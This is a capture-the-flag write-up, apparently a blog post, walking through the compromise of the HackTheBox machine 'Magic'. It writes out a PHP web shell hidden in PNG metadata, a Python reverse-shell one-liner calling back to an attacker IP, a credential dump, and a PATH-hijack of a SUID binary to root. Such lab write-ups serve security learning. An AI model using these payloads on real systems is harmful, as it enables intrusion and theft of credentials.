HackTheBox — Magic

Summary

Magic is a medium machine rate with IP 10.10.10.185

Enumeration

Nmap

Web Browsing

Port 80

I found login page, So i think to use sql injection

It’s redirected me to upload.php page

I tried to upload php file, But i got error

I decided to inject the payload in png photo using exfitool

root@strike:~# exiftool -Comment='<?php system($_GET["cmd"]); ?>' test.php.png 
1 image files updated
root@strike:~#

After upload i went to directory and tried to executed commands

And It’s work, After that i tried to get the reverse shell

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.20",4142));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Got it

root@strike:~# nc -lvp 4142
listening on [any] 4142 ...
10.10.10.185: inverse host lookup failed: Unknown host
connect to [10.10.14.55] from (UNKNOWN) [10.10.10.185] 47278
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@ubuntu:/var/www/Magic/images/uploads$

Let’s enumerate using this user

ww-data@ubuntu:/var/www/Magic$ls
ls
1 db.php5 index.php logout.php upload.php
assets images login.php magic.sql

Let’s take a look on db.php5

www-data@ubuntu:/var/www/Magic$ cat db.php5
cat db.php5
<?php
class Database
{
private static $dbName = 'Magic' ;
private static $dbHost = 'localhost' ;
private static $dbUsername = 'theseus';
private static $dbUserPassword = 'iamkingtheseus';

private static $cont = null;

public function __construct() {
die('Init function is not allowed');
}

public static function connect()
{
// One connection through whole application
if ( null == self::$cont )
{
try
{
self::$cont = new PDO( "mysql:host=".self::$dbHost.";"."dbname=".self::$dbName, self::$dbUsername, self::$dbUserPassword);
}
catch(PDOException $e)
{
die($e->getMessage());
}
}
return self::$cont;
}

public static function disconnect()
{
self::$cont = null;
}
}

Now we have new credentials to access, But i can’t switch to this user
I decided to dump all database

www-data@ubuntu:/tmp$ mysqldump Magic -u theseus -p
mysqldump Magic -u theseus -p
Enter password: iamkingtheseus

-- MySQL dump 10.13 Distrib 5.7.29, for Linux (x86_64)
--
-- Host: localhost Database: Magic
-- ------------------------------------------------------
-- Server version 5.7.29-0ubuntu0.18.04.1
...
--
-- Dumping data for table `login`
--

LOCK TABLES `login` WRITE;
/*!40000 ALTER TABLE `login` DISABLE KEYS */;
INSERT INTO `login` VALUES (1,'admin','Th3s3usW4sK1ng');
/*!40000 ALTER TABLE `login` ENABLE KEYS */;
UNLOCK TABLES;
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;

/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
...
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;

-- Dump completed on 2020-08-18 10:22:14

I got password from database, Let’s switch to this user

www-data@ubuntu:/var/www/Magic$ su - theseus
su - theseus
Password: Th3s3usW4sK1ng

theseus@ubuntu:~$

Gain user flag!

Privilege Escalation

SUID Binaries

theseus@ubuntu:~$ find / -perm -u=s 2>/dev/null
/usr/sbin/pppd
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/pkexec
.....
.....
/bin/umount
/bin/fusermount
/bin/sysinfo
/bin/mount

Take a look on /bin/sysinfo

theseus@ubuntu:~$ strings /bin/sysinfo
/lib64/ld-linux-x86-64.so.2
libstdc++.so.6
__gmon_start__
_ITM_deregisterTMCloneTable
_ITM_registerTMCloneTable
.....
.....
popen() failed!
====================Hardware Info====================
lshw -short
====================Disk Info====================
fdisk -l
====================CPU Info====================
cat /proc/cpuinfo
====================MEM Usage=====================
free -h

Path Injection
I created an executable named lshw in /tmp and added /tmp to the PATH environment variable

theseus@ubuntu:/tmp$ cat lshw
/bin/bash 1>&0 2>&0
theseus@ubuntu:/tmp$ chmod +x lshw
theseus@ubuntu:/tmp$ ls -al lshw
-rwxrwxr-x 1 theseus theseus 20 Aug 18 16:32 lshw
theseus@ubuntu:/tmp$ export PATH=/tmp:$PATH
theseus@ubuntu:/tmp$ echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin

Run /bin/sysinfo

theseus@ubuntu:/tmp$ /bin/sysinfo
====================Hardware Info====================
root@ubuntu:/tmp# cd /root
root@ubuntu:/root# ls
info.c root.txt
root@ubuntu:/root#

Gain root flag!

If u learn any thing useful from write up, Respect me on HackTheBox

THX for ur time!

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Ahmed Samir

Ahmed Samir

CTFer | Computer Science Student